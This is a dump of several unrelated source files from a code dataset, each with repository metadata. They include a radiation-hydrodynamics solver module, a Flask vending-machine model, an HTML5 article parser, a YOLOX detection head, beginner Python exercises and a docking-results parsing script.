storage\n self.P = self.rh.mat.pressureEOS(self.rho * self.e)\n self.P_n = np.copy(self.P)\n self.P_old = np.copy(self.P)\n \n # Init momentum storage\n self.M = self.rho * self.u\n self.M_n = np.copy(self.M)\n self.M_old = np.copy(self.M)\n \n # Total material energy\n self.Em = self.rho * (0.5 * self.u**2 + self.e)\n self.Em_n = np.copy(self.Em) \n self.Em_old = np.copy(self.Em)\n \n # Hydro vectors\n self.U_n = np.hstack((self.rho_n, self.M_n, self.Em_n))\n self.U_old = np.copy(self.U_n)\n \n # Hydro boundary conditions\n if self.inp.bc_L_hydro_type == \"fixed\":\n self.rho_bL = self.inp.rho(self.geo.rL)\n self.u_bL = self.inp.u(self.geo.rL)\n self.T_bL = self.inp.T(self.geo.rL)\n self.e_bL = self.inp.C_v * self.T_bL\n self.P_bL = self.mat.pressureEOS(self.rho_bL * self.e_bL)\n self.M_bL = self.rho_bL * self.u_bL\n self.Em_bL = self.rho_bL * (0.5 * self.u_bL**2 + self.e_bL)\n self.U_bL = np.array([self.rho_bL, self.M_bL, self.Em_bL])\n else:\n self.rho_bL = None\n self.u_bL = None\n self.T_bL = None\n self.e_bL = None\n self.P_bL = None\n self.M_bL = None\n self.Em_bL = None\n self.U_bL = None \n \n if self.inp.bc_R_hydro_type == \"fixed\":\n self.rho_bR = self.inp.rho(self.geo.rR)\n self.u_bR = self.inp.u(self.geo.rR)\n self.T_bR = self.inp.T(self.geo.rR)\n self.e_bR = self.inp.C_v * self.T_bR\n self.P_bR = self.mat.pressureEOS(self.rho_bR * self.e_bR)\n self.M_bR = self.rho_bR * self.u_bR\n self.Em_bR = self.rho_bR * (0.5 * self.u_bR**2 + self.e_bR)\n self.cs_bR = self.mat.computeSoundSpeed(self.rho_bR, self.P_bR)\n self.U_bR = np.array([self.rho_bR, self.M_bR, self.Em_bR])\n else:\n self.rho_bR = None\n self.u_bR = None\n self.T_bR = None\n self.e_bR = None\n self.P_bR = None\n self.M_bR = None\n self.Em_bR = None\n self.U_bR = None\n \n \n # Init radiation energy density\n self.Er = self.initializeAtCenters(self.inp.Er)\n self.Er_n = np.copy(self.Er)\n self.Er_old = np.copy(self.Er)\n \n # Set radiation boundary conditions\n if self.inp.bc_L_rad_type == \"source\":\n if self.inp.bc_L_rad_val is None:\n self.Er_bL = self.inp.Er(self.inp.rL)\n else:\n self.Er_bL = self.inp.bc_L_rad_val\n else:\n self.Er_bL = None\n\n if self.inp.bc_R_rad_type == \"source\":\n if self.inp.bc_R_rad_val is None:\n self.Er_bR = self.inp.Er(self.inp.rR)\n else:\n self.Er_bR = self.inp.bc_R_rad_val\n else:\n self.Er_bR = None\n \n # Hydro LD values --- Constructed after init\n self.U_ld, self.P_ld = np.zeros((self.geo.N,3,2)), np.zeros((self.geo.N,2))\n \n # Radiation LD 
values --- Constructed after init\n self.Er_ld = np.zeros((self.geo.N,1,2))\n \n # Slopes\n self.U_slopes = np.zeros((self.geo.N,3,2))\n self.Er_slopes = np.zeros((self.geo.N,2))\n \n # Radiation edge values -- Constructed after init\n self.Er_edge = np.zeros(self.geo.N+1)\n \n # Energy conservation book keeping\n self.material_energy = []\n self.material_advection = []\n self.radiation_energy = []\n self.radiation_leakage = []\n self.radiation_advection = []\n self.total_energy = []\n \n # Set initial energy in system\n Emat, Erad = 0, 0\n for i in range(self.geo.N):\n Emat += self.geo.V[i] * self.Em_old[i]\n Erad += self.geo.V[i] * self.Er_old[i]\n print(\"Emat Erad\", Emat, Erad)\n self.material_energy.append(Emat)\n self.material_advection.append(0)\n self.radiation_energy.append(Erad)\n self.radiation_leakage.append(0)\n self.radiation_advection.append(0)\n self.total_energy.append(Emat + Erad)\n \n self.total_material_advection = 0\n self.total_radiation_advection = 0 \n self.total_radiation_leakage = 0\n \n \n ##### FUNCTIONS #####\n\n\n #########################################################################\n # Description:\n # Initialize solution variables at cell centers using specified ICs\n #########################################################################\n def initializeAtCenters(self, function):\n values = np.zeros([self.geo.N, 1])\n if function is not None:\n for i in range(self.geo.N):\n values[i] = function(self.geo.r[i])\n return values\n \n #########################################################################\n # Description:\n # Move most recent field variables to old field variables.\n #########################################################################\n def stepSolutions(self):\n self.rho_old = np.copy(self.rho)\n self.u_old = np.copy(self.u)\n self.e_old = np.copy(self.e)\n self.P_old = np.copy(self.P)\n self.T_old = np.copy(self.T)\n self.M_old = np.copy(self.M)\n self.Em_old = np.copy(self.Em)\n self.Er_old = np.copy(self.Er)\n \n \n #########################################################################\n # Description:\n # Form a vector containing all hydro quantities at cell centers of the mesh.\n #########################################################################\n def updateConservedHydroVector(self, predictor=True):\n if predictor:\n self.U_old = np.hstack((self.rho_old, self.M_old, self.Em_old))\n else:\n self.U_n = np.hstack((self.rho_n, self.M_old, self.Em_n)) \n \n \n #########################################################################\n # Description:\n # Compute edge radiation values using continuity of current across cell\n # interfaces. This yields a diffusion coefficient weighted harmonic\n # mean at each interface. 
This by definition is only performed for \n # interior cell interfaces\n ######################################################################### \n def updateEdgeRadiationEnergy(self, predictor):\n # Shorthand\n dr = self.geo.dr\n D_edge = self.mat.D_edge\n Er_edge = self.Er_edge\n \n # Query correct variables\n if predictor:\n Er = self.Er_old\n rho = self.rho\n T = self.T_old\n else:\n Er = self.Er_n\n rho = self.rho_n\n T = self.T_n\n \n # Left boundary\n if self.inp.bc_L_rad_type == \"source\":\n kappa_t_L = self.mat.kappa_funcs[0](T[0]) + self.mat.kappa_s[0]\n coef_L = 3 * rho[0] * kappa_t_L * dr[0]\n Er_edge[0] = (3*coef_L*self.Er_bL + 4*Er[0]) / (coef_L + 4) \n else:\n Er_edge[0] = Er[0]\n \n # Interior edges\n for i in range(1, self.geo.N):\n coef_L = D_edge[i-1,1] / dr[i-1]\n coef_R = D_edge[i,0] / dr[i]\n Er_edge[i] = (coef_R*Er[i] + coef_L*Er[i-1])/(coef_L + coef_R)\n \n # Right boundary\n if self.inp.bc_R_rad_type == \"source\":\n kappa_t_R = self.mat.kappa_funcs[-1](T[-1]) + self.mat.kappa_s[-1]\n coef_R = 3 * rho[-1] * kappa_t_R * dr[-1]\n Er_edge[-1] = (3*coef_R*self.Er_bR + 4*Er[-1]) / (coef_L + 4)\n else:\n Er_edge[-1] = Er[-1]\n \n \n #########################################################################\n # Description:\n # Compute edge fluxes from reconstructed edge data for either hydro or\n # radiation energy. This function generated edge values for the conserved\n # quantities (hydro/radiation), computes the auxillary variable \n # (pressure/velocity), and then computes fluxes from that.\n #########################################################################\n def computeFluxes(self, U_ld, X_ld):\n U_ld = np.atleast_3d(U_ld)\n X_ld = np.atleast_2d(X_ld)\n \n # Init edge fluxes\n F_edge = np.zeros(U_ld.shape)\n \n # Hydro fluxes\n if (U_ld.shape[1] == 3):\n # mass flux\n F_edge[:,0,:] = U_ld[:,1,:]\n # momentum flux\n F_edge[:,1,:] = U_ld[:,1,:]**2/U_ld[:,0,:] + X_ld\n # energy flux\n F_edge[:,2,:] = (U_ld[:,2,:] + X_ld) * U_ld[:,1,:]/U_ld[:,0,:]\n \n # Radiation flux\n else:\n # Radiation energy flux\n F_edge[:,0,:] = U_ld[:,0,:] * X_ld \n \n return F_edge \n \n \n #########################################################################\n # Description:\n # Energy conservation checker\n #########################################################################\n def energyConservationCheck(self):\n # Shorthand\n A = self.geo.A\n V = self.geo.V\n dt = self.rh.dt\n dr = self.geo.dr\n c = self.mat.c\n \n # Shorthand field variables\n Em = self.Em\n Em_np = self.Em_n\n Er = self.Er\n Er_np = self.Er_n\n Er_old = self.Er_old\n Er_n = 0.5 * (Er + Er_old)\n T_np = self.T_n\n rho_np = self.rho_n\n P_np = self.P_n\n u_np = self.u_n\n D_edge = self.mat.D_edge\n \n material_energy = self.material_energy\n material_advection = self.material_advection\n radiation_energy = self.radiation_energy\n radiation_leakage = self.radiation_leakage\n radiation_advection = self.radiation_advection\n total_energy = self.total_energy\n \n # Total material and radiation energy\n Emat, Erad = 0, 0\n for i in range(self.geo.N):\n Emat += V[i] * Em[i] \n Erad += V[i] * Er[i]\n print(\"Er0 ErNm1 Em0 EmNm1\",Er[0],Er[self.geo.N-1],Em[0],Em[self.geo.N-1])\n material_energy.append(Emat)\n radiation_energy.append(Erad)\n \n # Advection leakage and work energy\n if self.inp.bc_L_hydro_type == \"transmissive\":\n F_L_madv = (Em_np[0] + P_np[0]) * u_np[0]\n if self.inp.mode == \"radhydro\":\n F_L_radv = 4./3. 
* Er_np[0] * u_np[0]\n else:\n F_L_radv = 0.0\n else:\n F_L_madv, F_L_radv = 0.0, 0.0\n \n if self.inp.bc_R_hydro_type == \"transmissive\":\n F_R_madv = (Em_np[-1] + P_np[-1]) * u_np[-1]\n if self.inp.mode == \"radhydro\":\n F_R_radv = 4./3. * Er_np[-1] * u_np[-1]\n else:\n F_R_radv = 0.0\n else: \n F_R_madv, F_R_radv = 0.0, 0.0\n mat_adv = (A[-1] * F_R_madv - A[0] * F_L_madv) * dt\n rad_adv = (A[-1] * F_R_radv - A[0] * F_L_radv) * dt\n material_advection.append(mat_adv)\n radiation_advection.append(rad_adv)\n self.total_material_advection += mat_adv\n self.total_radiation_advection += rad_adv\n \n # Radiation leakage\n if self.inp.bc_L_rad_type == \"source\":\n coef_F_L = -2 * c / (4 + dr[0] / D_edge[0,0])\n F_L_rad = coef_F_L * (Er_n[0] - self.Er_bL)\n else:\n F_L_rad = 0.0\n if self.inp.bc_R_rad_type == \"source\":\n coef_F_R = -2 * c / (4 * dr[-1] / D_edge[-1,1])\n F_R_rad = coef_F_R * (self.Er_bR - Er_n[-1])\n else:\n F_R_rad = 0.0\n rad_leakage = (A[-1] * F_R_rad - A[0] * F_L_rad) * dt\n radiation_leakage.append(rad_leakage)\n self.total_radiation_leakage += rad_leakage\n \n # Total energy\n total = Emat + Erad + mat_adv + rad_adv + rad_leakage\n total_energy.append(total)\n \n # Compute energy balance\n dEmat = Emat - material_energy[0]\n dErad = Erad - radiation_energy[0]\n total_mat_adv = self.total_material_advection\n total_rad_adv = self.total_radiation_advection\n total_rad_leak = self.total_radiation_leakage\n\n print(\"dEmat \",dEmat ,\"\\n\",\n \"dErad \",dErad ,\"\\n\",\n \"total_mat_adv \",total_mat_adv ,\"\\n\",\n \"total_rad_adv \",total_rad_adv ,\"\\n\",\n \"total_rad_leak \",total_rad_leak,\"\\n\",\n \"mat_adv {:1.16e} \".format(mat_adv[0]) ,\"\\n\",\n \"rad_adv {:1.16e} \".format(rad_adv[0]) ,\"\\n\",\n \"rad_leakage \",rad_leakage ,\"\\n\",\n )\n \n return dEmat + dErad + total_mat_adv + total_rad_adv + total_rad_leak\n \n\n #########################################################################\n # Description:\n # This function plots the desired field variable specified.\n #########################################################################\n def plotFields(self, variables, styles=[], xlims=[], ylims=[],savename=\"\",title=\"\"):\n fig = plt.figure()\n plt.rc(\"text\", usetex=True)\n for i, var in enumerate(variables):\n vals = getattr(self, var)\n if len(variables) == 1 and \"Er\" in var:\n label = \"Radiation Energy\"\n plt.ylabel(\"Radiation Energy (jerks/cm$^3$)\", fontsize=16)\n elif \"Er\" in var:\n vals = (vals / self.inp.a)**(1/4)\n label = \"Radiation Temperature\"\n elif \"T\" in var:\n label = \"Temperature\"\n plt.ylabel(\"Temperature (keV)\", fontsize=16)\n elif \"rho\" in var:\n label = \"Mass Density\"\n plt.ylabel(\"Mass Density (g/cm$^3$)\", fontsize=16)\n elif \"u\" in var:\n label = \"Velocity\"\n plt.ylabel(\"Velocity (cm/sh)\", fontsize=16)\n elif \"e\" in var:\n label = \"Internal Energy\"\n plt.ylabel(\"Internal Energy (jerks/g)\", fontsize=16)\n \n plt.plot(self.geo.r, vals, styles[i], ms=2.5, label=label)\n \n plt.xlabel(\"r (cm)\",fontsize=16)\n if xlims == []:\n plt.xlim([self.geo.rL, self.geo.rR])\n else:\n plt.xlim(xlims)\n if ylims != []:\n plt.ylim(ylims)\n plt.grid()\n plt.legend(fontsize=10)\n plt.title(title)\n if savename != \"\":\n plt.savefig(savename)\n # plt.show()\n \n 
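# A minimal, self-contained sketch of the interior-edge reconstruction used in
# updateEdgeRadiationEnergy above (illustrative names and array shapes, not the
# class's own attributes): requiring continuity of the diffusion current
# F = -D dEr/dr across each interior face gives a D/dr-weighted average of the
# two neighboring cell-centered values.
import numpy as np

def interior_edge_radiation(Er, D_edge, dr):
    # Er: (N,) cell-centered radiation energies
    # D_edge: (N, 2) diffusion coefficients at each cell's left/right face
    # dr: (N,) cell widths
    N = Er.shape[0]
    Er_edge = np.zeros(N + 1)
    Er_edge[0], Er_edge[-1] = Er[0], Er[-1]  # simple copy at the outer faces
    for i in range(1, N):
        coef_L = D_edge[i - 1, 1] / dr[i - 1]  # left cell, its right face
        coef_R = D_edge[i, 0] / dr[i]          # right cell, its left face
        Er_edge[i] = (coef_R * Er[i] + coef_L * Er[i - 1]) / (coef_L + coef_R)
    return Er_edge

# With equal D/dr on both sides the weights match and each interior face is a
# plain average: Er = [1, 2, 4] with unit D_edge and dr gives faces 1.5 and 3.0.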
","repo_name":"Naktakala/rad_hydro","sub_path":"References/eulerian-radhydro-master/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":16360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"1855750966","text":"import flask\nimport flask_sqlalchemy\nfrom change import change_money\n\napp = flask.Flask(__name__, static_url_path='/static')\napp.config['DEBUG'] = True\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://user:password@localhost/vms'\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db'\ndb = flask_sqlalchemy.SQLAlchemy(app)\n\n\nclass Good(db.Model):\n \"\"\"\n This is something that we can sell in Vending Machine. Can be tea, coffee,\n or even a nuclear weapon - it's your Vending Machine, so you can decide what\n you want to sell in it.\n \"\"\"\n #: the unique id\n id = db.Column(db.Integer, primary_key=True)\n #: the human readable name of this stuff\n name = db.Column(db.String)\n #: the price per unit\n price = db.Column(db.Integer)\n #: how many items we have in stock\n amount = db.Column(db.Integer)\n #: the Vending Machine where we sell it\n vm_id = db.Column(db.Integer, db.ForeignKey('vending_machine.id'))\n\n\nclass Buyer(db.Model):\n \"\"\"\n This is the user, how can buy something in Vending Machine (or just change\n some money)\n \"\"\"\n #: the unique id\n id = db.Column(db.Integer, primary_key=True)\n #: how many coins of 1 ruble the user have\n coins_1 = db.Column(db.Integer, default=10)\n #: how many coins of 2 rubles the user have\n coins_2 = db.Column(db.Integer, default=30)\n #: how many coins of 5 rubles the user have\n coins_5 = db.Column(db.Integer, default=20)\n #: how many coins of 10 rubles the user have\n coins_10 = db.Column(db.Integer, default=15)\n #: the unique token for identify the buyer\n token = db.Column(db.String, unique=True)\n\n def get_coins(self):\n \"\"\"\n This method return a dict with all available coins\n \"\"\"\n coins = {1: self.coins_1, 2: self.coins_2,\n 5: self.coins_5, 10: self.coins_10}\n return coins\n\n def give_coin(self, coin):\n \"\"\"\n This method ask for a coin and return True if user give this coin, or\n False if it haven't this kind of coins\n\n :param int coin: the coin ask we for\n :returns: True if the operation is successful\n :rtype: bool\n \"\"\"\n field = 'coins_%d' % coin\n if hasattr(self, field):\n value = getattr(self, field)\n if value > 0:\n setattr(self, field, value - 1)\n return True\n return False\n\n def add_coins(self, coins):\n \"\"\"\n This method will put in the wallet of user the given coins\n\n :param dict coins: a dict with key as value of coin and value as its amount\n :returns: True is operation is successful\n :rtype: bool\n \"\"\"\n for coin, amount in coins.iteritems():\n field = 'coins_%d' % coin\n value = getattr(self, field)\n setattr(self, field, value + amount)\n return True\n\n\nclass VendingMachine(db.Model):\n \"\"\"\n This is our Vending Machine\n \"\"\"\n #: unique id\n id = db.Column(db.Integer, primary_key=True)\n #: how many coins of 1 ruble the vm have\n coins_1 = db.Column(db.Integer, default=100)\n #: how many coins of 2 rubles the vm have\n coins_2 = db.Column(db.Integer, default=100)\n #: how many coins of 5 rubles the vm have\n coins_5 = db.Column(db.Integer, default=100)\n #: how many coins of 10 rubles the vm have\n coins_10 = db.Column(db.Integer, default=100)\n #: the amount of money, available for buying something\n buff = db.Column(db.Integer, default=0)\n #: the 
list of all stuff we can buy in VM\n goods = db.relationship(Good, backref=\"vm\")\n #: the current user that use this VM\n buyer_id = db.Column(db.Integer, db.ForeignKey('buyer.id'), nullable=True)\n buyer = db.relationship(Buyer, backref='vending_machine')\n\n def get_coins(self):\n \"\"\"\n This method return a dict with all available coins\n \"\"\"\n coins = {1: self.coins_1, 2: self.coins_2,\n 5: self.coins_5, 10: self.coins_10}\n return coins\n\n def substract(self, coins):\n \"\"\"\n Substract the given list of coins from Vending Machine\n\n :param dict coins: a dict of coins (format like in get_coins)\n :returns: True if operation was successful\n :rtype: bool\n \"\"\"\n for coin, amount in coins.iteritems():\n field = 'coins_%d' % coin\n value = getattr(self, field)\n setattr(self, field, value - amount)\n return True\n\n def add_to_buff(self, coin):\n \"\"\"\n Add a coin to buffer\n\n :param int coin: the value of coin\n :returns: True if the operation was successful\n :rtype: bool\n \"\"\"\n field = 'coins_%d' % coin\n if hasattr(self, field):\n value = getattr(self, field)\n setattr(self, field, value + 1)\n self.buff += coin\n return True\n return False\n\n def return_from_buff(self):\n \"\"\"\n Return all money from VMs buffer to user\n\n :returns: a dict with changed money from buffer (as in get_coins)\n :rtype: dict\n \"\"\"\n ret = {}\n if self.buff > 0:\n ret = change_money(self.buff, self.get_coins())\n self.substract(ret)\n self.buff = 0\n return ret\n","repo_name":"gnunixon/vending_machine_sim","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74475453856","text":"#Write a program to find and replace a particular pattern in a string with a given pattern.\n#For example:\n'''\nEnter a sentence: My favourite programming language is Python. This language is very flexible and will not age.\nEnter a pattern to find: age\nEnter a pattern to replace: xyz\nOriginal Sentence: My favourite programming language is Python. This language is very flexible and will not age.\nReplaced Sentence: My favourite programming languxyz is Python. This languxyz is very flexible and will not xyz.\n'''\n#User input\nsentence=input(\"Enter a sentence: \")\npattern=input(\"Enter a pattern to find: \")\nreplace=input(\"Enter a pattern to replace: \")\n#pattern length\npLen = len(pattern)\ns=sentence2=\"\"\ni=0\n#replacing the sentence\nwhile i < len(sentence):\n s=sentence[i:pLen+i]\n if s==pattern:\n s=\"\"\n sentence2+=replace\n i+=pLen\n else:\n sentence2+=sentence[i]\n i+=1\nprint(\"Original Sentence: \",sentence)\nprint(\"Replaced Sentence: \",sentence2)\n","repo_name":"Easyvipin/Practice-Python","sub_path":"Strings/q21.py","file_name":"q21.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"34"} +{"seq_id":"10223883663","text":"\"\"\"\nHTML5 parsing.\n\"\"\"\n\nimport html5lib\n\ndef article(pathname):\n \"\"\"\n Find the top-most
<article> in the HTML5 document at pathname.\n \"\"\"\n return _article(html5lib.parse(open(pathname)))\ndef _article(node):\n if 0 == len(node.childNodes):\n return None\n for n in node.childNodes:\n if \"article\" == n.name:\n return n\n for n in node.childNodes:\n out = _article(n)\n if out is not None:\n return out\n\ndef article_title(article):\n \"\"\"\n Return the title of the HTML5 <article>. This is the contents of the\n <h1> and all its children with tags stripped. If necessary, this will\n traverse <hgroup> and <header>
    tags.\n \"\"\"\n for n in article.childNodes:\n if \"h1\" == n.name:\n return _article_title(n)\n elif \"hgroup\" == n.name or \"header\" == n.name:\n return article_title(n)\n return None\ndef _article_title(node):\n title = []\n for n in node.childNodes:\n if n.name is None:\n title.append(n.value)\n else:\n title.extend(_article_title(n))\n return \"\".join(title)\n","repo_name":"rcrowley/spoon","sub_path":"spoon/html5.py","file_name":"html5.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"72236251298","text":"import math\nimport time\nfrom loguru import logger\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom dass_det.utils import bboxes_iou, intersect, cxcywh2xyxy\n\nfrom .network_blocks import BaseConv, DWConv\n\n\nclass YOLOXHead(nn.Module):\n def __init__(\n self,\n num_classes,\n width=1.0,\n strides=[8, 16, 32],\n in_channels=[256, 512, 1024],\n act=\"silu\",\n depthwise=False,\n loss_fn=None\n ):\n \"\"\"\n Args:\n act (str): activation type of conv. Defalut value: \"silu\".\n depthwise (bool): whether apply depthwise conv in conv branch. Defalut value: False.\n \"\"\"\n super().__init__()\n\n self.num_classes = num_classes\n \n self.reg_convs = nn.ModuleList()\n self.reg_preds = nn.ModuleList()\n self.obj_preds = nn.ModuleList()\n \n Conv = DWConv if depthwise else BaseConv\n\n for i in range(len(in_channels)):\n\n self.reg_convs.append(\n nn.Sequential(\n *[\n Conv(\n in_channels=int(256 * width),\n out_channels=int(256 * width),\n ksize=3,\n stride=1,\n act=act,\n ),\n Conv(\n in_channels=int(256 * width),\n out_channels=int(256 * width),\n ksize=3,\n stride=1,\n act=act,\n ),\n ]\n )\n )\n \n self.reg_preds.append(\n nn.Conv2d(\n in_channels=int(256 * width),\n out_channels=4,\n kernel_size=1,\n stride=1,\n padding=0,\n )\n )\n self.obj_preds.append(\n nn.Conv2d(\n in_channels=int(256 * width),\n out_channels=1,\n kernel_size=1,\n stride=1,\n padding=0,\n )\n )\n\n self.strides = strides\n self.in_channels=in_channels\n self.loss_fn = loss_fn\n\n def initialize_biases(self, prior_prob):\n for conv in self.obj_preds:\n b = conv.bias.view(1, -1)\n b.data.fill_(-math.log((1 - prior_prob) / prior_prob))\n conv.bias = torch.nn.Parameter(b.view(-1), requires_grad=True)\n\n def forward(self, xin):\n \n reg_outputs, obj_outputs = [], []\n \n for k, (reg_conv, x) in enumerate(zip(self.reg_convs, xin)):\n reg_feat = reg_conv(x)\n reg_output = self.reg_preds[k](reg_feat)\n obj_output = self.obj_preds[k](reg_feat)\n \n reg_outputs.append(reg_output)\n obj_outputs.append(obj_output)\n\n outputs = []\n for reg_output, obj_output in zip(reg_outputs, obj_outputs):\n output = torch.cat([reg_output, obj_output.sigmoid()], 1)\n outputs.append(output)\n \n self.hw = [x.shape[-2:] for x in outputs]\n \n outputs = torch.cat(\n [x.flatten(start_dim=2) for x in outputs], dim=2\n ).permute(0, 2, 1)\n \n outputs = self.decode_outputs(outputs, dtype=xin[0].type())\n \n return outputs\n \n \n def decode_outputs(self, outputs, dtype):\n # converted to class part-free\n grids = []\n strides = []\n for (hsize, wsize), stride in zip(self.hw, self.strides):\n yv, xv = torch.meshgrid([torch.arange(hsize), torch.arange(wsize)])\n grid = torch.stack((xv, yv), 2).view(1, -1, 2)\n grids.append(grid)\n shape = grid.shape[:2]\n strides.append(torch.full((*shape, 1), stride))\n\n grids = torch.cat(grids, dim=1).type(dtype)\n strides = torch.cat(strides, 
dim=1).type(dtype)\n\n outputs[..., :2] = (outputs[..., :2] + grids) * strides\n outputs[..., 2:4] = torch.exp(outputs[..., 2:4]) * strides\n return outputs","repo_name":"barisbatuhan/DASS_Det_Inference","sub_path":"dass_det/models/yolo_head.py","file_name":"yolo_head.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"34"} +{"seq_id":"3813452268","text":"# Syntax\n\"\"\"\ndef subroutine/functionName():\n subroutine/functionBody(code)\n subroutine/functionBody(code)\n subroutine/functionBody(code)\n subroutine/functionBody(code)\n\n#call/invoke the subroutine/function\nsubroutineName/function()\n\"\"\"\n\"A subroutine(function) may or may not have a return statement\"\n\"A subroutine(function) may or may not have parameters\"\n\n\n\"To Do: Predict, then Run, and then Investigate\"\n\n\ndef user(): # define the subroutine/function userName\n name = \"Emjay\"\n print(\"Your name is: \", name)\n\n\ndef userName(): # define the subroutine userName\n name = input((\"What is your name? \"))\n print(\"Your name is: \", name)\n\n\n# call/invoke the functioneName\n# \"Method 1\"\ndef addition(): # defines the addition function\n # variables inside a surbroutine/function have local scope\n num1 = int(input((\"Enter your first number: \")))\n num2 = int(input((\"Enter your second number: \")))\n answer = num1 + num2\n return answer\n\n\nprint(addition())\nprint(f\"Method 2\\nThe answer is {addition()}\")\n\n# \"Method 2\"\n# # Assigned the function to the variable myAddition\nmyAddition = addition()\n\nprint(f\"Method 2\\nThe answer is {myAddition}\")\n\n\n# What is the difference between a function in JS and a function in python ?\n\ndef addition(): # defines the addition function\n # variables inside a surbroutine/function have local scope\n num1 = int(input((\"Enter your first number: \")))\n num2 = int(input((\"Enter your second number: \")))\n answer = num1 + num2\n\n\n\"Exercise: modify the code in userName subroutine to convert it to a function \"\n\n\ndef userName(): # define the subroutine userName\n name = input((\"What is your name? 
\"))\n return f\"Your name is: {name}\"\n","repo_name":"agundogdu99/JustIT-Bootcamp","sub_path":"Python/Part4_ Subs_Funcs StrtingFiles/2_functions2/func1.py","file_name":"func1.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17005010599","text":"from extensions import db\nfrom models.model_mixins import ModelMixins\nfrom models.token import Token\n\n\nclass Product(db.Model, ModelMixins):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100), nullable=False)\n price = db.Column(db.Integer, nullable=False)\n date_added = db.Column(db.DateTime, nullable=False)\n\n @classmethod\n def get_product(cls, pid):\n response = cls.query.get(pid)\n return response\n\n @classmethod\n def get_all_products(cls):\n response = cls.query.all()\n return response\n\n @classmethod\n def delete_product(cls, pid):\n response = cls.query.get(pid)\n response.delete()\n\n\n\n\n","repo_name":"ArfaMaryamKhanSSI/Product_Catalog_Flask_Project","sub_path":"models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7115128671","text":"n,k = map(int,input().split())\n\ni = 1\ncnt = 0\nt = 0\nwhile n > 0:\n t = k**i - 1\n i += 1\n cnt += 1\n if n-t <= 0:\n break\n\nprint(cnt)\n","repo_name":"ars1208/atcoder","sub_path":"ABC156/ABC156_b.py","file_name":"ABC156_b.py","file_ext":"py","file_size_in_byte":149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73767644897","text":"import pandas as pd\n\ndatatypes = [\"all\", \"ki\", \"kd\"]\nmodeltypes = [\n \"linearRegression\",\n \"Ridge\",\n \"Lasso\",\n \"ElasticNet\",\n \"SVR\",\n \"DecisionTree\",\n \"RandomForest\",\n]\nadditional_information = [\"final\",\"GAP\"]\nscoretypes = [\"delta_G\", \"Affinity_Data_Value\", \"pKd_pKi_pIC50\"]\nsigns = [\"positive\",\"negative\"]\n\ndata_list = []\nmodel_list = []\nadd_info_list = []\nscore_list = []\nstart = False\ntop1_number_list = []\ntop1_percent_list = []\ntop2_number_list = []\ntop2_percent_list = []\ntop3_number_list = []\ntop3_percent_list = []\nspearman_02_list = []\nspearman_03_list = []\nspearman_04_list = []\nspearman_05_list = []\nspearman_06_list = []\nspearman_07_list = []\nspearman_08_list = []\nspearman_09_list = []\nspearman_010_list = []\nconf_02_list = []\nconf_03_list = []\nconf_04_list = []\nconf_05_list = []\nconf_06_list = []\nconf_07_list = []\nconf_08_list = []\nconf_09_list = []\nconf_010_list = []\n\nfor sign in signs:\n for data in datatypes:\n for model in modeltypes:\n for add_info in additional_information:\n for score in scoretypes:\n output = open(\n f\"results_power_docking_{sign}/{data}{model}{add_info}{score}.out\", \"r\"\n )\n lines = output.readlines()\n for i, line in enumerate(lines):\n if line[:29] == \"Summary of the docking power:\":\n data_list.append(data)\n model_list.append(model)\n add_info_list.append(add_info)\n score_list.append(score)\n tmp = i\n start = True\n elif start == True:\n if i == tmp + 2:\n tmp_line = str(line).split(sep=\" \")\n top1_number = tmp_line[6]\n top1_number = top1_number[0:-1]\n top1_percent = tmp_line[-1]\n top1_percent = top1_percent[0:-1]\n top1_number_list.append(top1_number)\n top1_percent_list.append(top1_percent)\n if i == tmp + 4:\n tmp_line = str(line).split(sep=\" \")\n top2_number = tmp_line[6]\n top2_number = 
top2_number[0:-1]\n top2_percent = tmp_line[-1]\n top2_percent = top2_percent[0:-1]\n top2_number_list.append(top2_number)\n top2_percent_list.append(top2_percent)\n if i == tmp + 6:\n tmp_line = str(line).split(sep=\" \")\n top3_number = tmp_line[6]\n top3_number = top3_number[0:-1]\n top3_percent = tmp_line[-1]\n top3_percent = top3_percent[0:-1]\n top3_number_list.append(top3_number)\n top3_percent_list.append(top3_percent)\n if i == tmp + 7:\n tmp_line = str(line).split(sep=\" \")\n spearman_02 = tmp_line[-1]\n spearman_02 = spearman_02[0:-1]\n spearman_02_list.append(spearman_02)\n if i == tmp + 8:\n tmp_line = str(line).split()\n conf_02 = tmp_line[-3:]\n conf_02 = str(conf_02[0]) + str(conf_02[1]) + str(conf_02[2])\n conf_02_list.append(conf_02)\n if i == tmp + 9:\n tmp_line = str(line).split(sep=\" \")\n spearman_03 = tmp_line[-1]\n spearman_03 = spearman_03[0:-1]\n spearman_03_list.append(spearman_03)\n if i == tmp + 10:\n tmp_line = str(line).split()\n conf_03 = tmp_line[-3:]\n conf_03 = str(conf_03[0]) + str(conf_03[1]) + str(conf_03[2])\n conf_03_list.append(conf_03)\n if i == tmp + 11:\n tmp_line = str(line).split(sep=\" \")\n spearman_04 = tmp_line[-1]\n spearman_04 = spearman_04[0:-1]\n spearman_04_list.append(spearman_04)\n if i == tmp + 12:\n tmp_line = str(line).split()\n conf_04 = tmp_line[-3:]\n conf_04 = str(conf_04[0]) + str(conf_04[1]) + str(conf_04[2])\n 